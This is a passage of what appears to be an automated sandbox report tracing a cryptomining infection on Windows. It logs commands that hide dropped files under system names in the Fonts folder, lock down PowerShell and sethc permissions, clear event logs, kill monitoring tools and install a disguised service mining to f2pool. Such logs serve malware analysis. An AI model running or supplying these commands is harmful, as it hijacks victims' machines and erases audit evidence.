C:\Windows\SysWOW64\cacls.execacls C:\Windows\Fonts\sqlservr.exe /d everyone3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\Fonts\csrss.exe /d everyone3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h +r C:\Windows\Fonts\csrss.exe3⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic process where "name='csrss.exe' and ExecutablePath='C:\\Windows\\Fonts\\csrss.exe'" call Terminate3⤵
- Kills process with WMI
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h +r C:\Windows\lsass.exe3⤵
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\lsass.exe /d everyone3⤵
-
C:\Windows\SysWOW64\sc.exesc stop "Application Layre Gateway Saervice"3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "Application Layre Gateway Saervice"3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /t /im boy.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h +r C:\Windows\boy.exe3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\boy.exe /d everyone3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /t /im powershell.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe /a3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe /g Administrators:f3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe /e /g Users:r3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe /e /g Administrators:r3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe /e /d SERVICE3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe /e /d "network service"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe /e /d system3⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /a3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /g Administrators:f3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /g Users:r3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /g Administrators:r3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d SERVICE3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d "network service"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d system3⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\system32\sethc.exe /a3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\sethc.exe /g Administrators:f3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\sethc.exe /e /g Users:r3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\sethc.exe /e /g Administrators:r3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\sethc.exe /e /d SERVICE3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\sethc.exe /e /d "network service"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\sethc.exe /e /g system:r3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /t /im wscript.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\wevtutil.exewevtutil cl "windows powershell"3⤵
-
C:\Windows\SysWOW64\wevtutil.exewevtutil cl "security"3⤵
-
C:\Windows\SysWOW64\wevtutil.exewevtutil cl "system"3⤵
-
\??\c:\windows\Fonts\svchost.exec:\windows\Fonts\svchost.exe start MetPipAtcivator2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\tem.vbs"2⤵
- Deletes itself
-
\??\c:\windows\Fonts\svchost.exec:\windows\Fonts\svchost.exe1⤵
- Executes dropped EXE
-
\??\c:\windows\Fonts\conhost.exe"c:\windows\Fonts\conhost.exe"2⤵
- Executes dropped EXE
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\cmd.execmd /c attrib -s -h -r -a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib -s -h -r -a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /im taskmgr.exe /f /T3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im taskmgr.exe /f /T4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /im rundll32.exe /f /T3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im rundll32.exe /f /T4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /im autoruns.exe /f /T3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im autoruns.exe /f /T4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /im perfmon.exe /f /T3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im perfmon.exe /f /T4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /im procexp.exe /f /T3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im procexp.exe /f /T4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c taskkill /im ProcessHacker.exe /f /T3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im ProcessHacker.exe /f /T4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c attrib -s -h -r -a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib -s -h -r -a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
\??\c:\windows\Fonts\svchost.exec:\windows\Fonts\svchost.exe install SetPipAtcivator rundlls -o stratum+tcp://x.f2pool.info:1230 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash -o stratum+tcp://m.f2pool.info:1235 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash3⤵
- Executes dropped EXE
-
\??\c:\windows\Fonts\svchost.exec:\windows\Fonts\svchost.exe set SetPipAtcivator DisplayName WMI Performance Services3⤵
- Executes dropped EXE
-
\??\c:\windows\Fonts\svchost.exec:\windows\Fonts\svchost.exe set SetPipAtcivator Description Identify computers that are connected to the network, collect and store the properties of these networks, and notify the application when they are changed.3⤵
- Executes dropped EXE
-
\??\c:\windows\Fonts\svchost.exec:\windows\Fonts\svchost.exe start SetPipAtcivator3⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +a C:\Windows\Fonts4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c attrib +s +a %SystemRoot%\Fonts3⤵
-
